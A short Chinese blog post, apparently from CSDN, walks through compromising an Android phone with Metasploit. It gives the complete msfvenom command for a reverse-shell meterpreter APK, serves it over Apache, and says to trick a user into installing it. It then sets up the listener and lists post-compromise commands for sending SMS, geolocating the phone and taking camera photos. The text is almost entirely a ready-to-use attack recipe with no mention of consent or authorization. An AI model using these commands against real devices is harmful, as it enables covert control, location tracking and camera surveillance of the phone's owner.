客户端渗透之——使用Metasploit渗透Android系统

版权声明:本文为博主原创文章,未经博主允许不得转载。 https://blog.csdn.net/l1028386804/article/details/86633320

转载请注明出处:https://blog.csdn.net/l1028386804/article/details/86633320

可以创建一个新的APK文件,也可以将攻击载荷注入到一个现有的APK文件来攻击Android平台,这里我们使用第一种方法。

1.创建APK文件

msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.175.128 LPORT=4444 R > /var/www/html/test.apk

2.启动Apache服务

service apache2 start

3.诱导用户下载安装APK

这一步,我们诱导用户下载并安装这个APK文件。

4.实施攻击

msfconsole
use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set LHOST 192.168.175.128
set LPORT 4444
exploit

到此,只要用户下载安装了我们的test.apk文件,我们就会获取到Meterpreter权限。

5.后渗透测试

在我们获取了目标Android手机的Meterpreter权限之后,我们可以执行如下命令进行后渗透攻击

注意:如下命令都是在meterpreter命令行下执行的。

5-1.查看手机是否root过

check_root

5-2.发送短信

send_sms -d 某个手机号码 -t "hello"

5-3.查看系统信息

sysinfo

5-4.对手机进行定位

wlan_geolocate

此命令会输出手机的经纬度,我们根据这个经纬度就可以知道手机的具体位置。

5-5.使用手机摄像头拍照

webcam_snap

猜你喜欢

转载自blog.csdn.net/l1028386804/article/details/86633320